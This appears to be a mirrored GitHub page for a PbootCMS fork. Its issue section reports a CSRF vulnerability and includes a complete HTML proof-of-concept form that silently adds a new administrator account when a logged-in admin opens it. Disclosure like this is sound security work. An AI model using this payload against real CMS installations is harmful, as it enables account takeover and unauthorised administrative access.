Git Product home page Git Product logo

tplusss / pbootcms Goto Github PK

View Code? Open in Web Editor NEW

This project forked from savalonewang/pbootcms

0.0 0.0 0.0 31.28 MB

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。系统采用简单到想哭的模板标签,只要懂HTML就可快速开发企业网站。官方提供了大量网站模板免费下载和使用,将致力于为广大开发者和企业提供最佳的网站开发建设解决方案。

Home Page: https://www.pbootcms.com

License: Apache License 2.0

PHP 81.33% CSS 7.08% HTML 9.09% TSQL 2.50%

pbootcms's People

Contributors

hnxsh avatar

Watchers

avatar

pbootcms's Issues

There is a CSRF vulnerability that can add the administrator account

After the administrator logged in, open this CSRFpoc page
CSRF.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://pboot.com:12345/admin.php?p=/User/add" method="POST">
      <input type="hidden" name="formcheck" value="d48ee9bffae5f7fb7022ea1e7dd4a224" />
      <input type="hidden" name="username" value="TplusSs" />
      <input type="hidden" name="realname" value="asd" />
      <input type="hidden" name="password" value="123" />
      <input type="hidden" name="rpassword" value="123" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="roles&#91;0&#93;" value="R101" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Then open the “/admin.php?p=/User/index” page to see the added system administrator

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.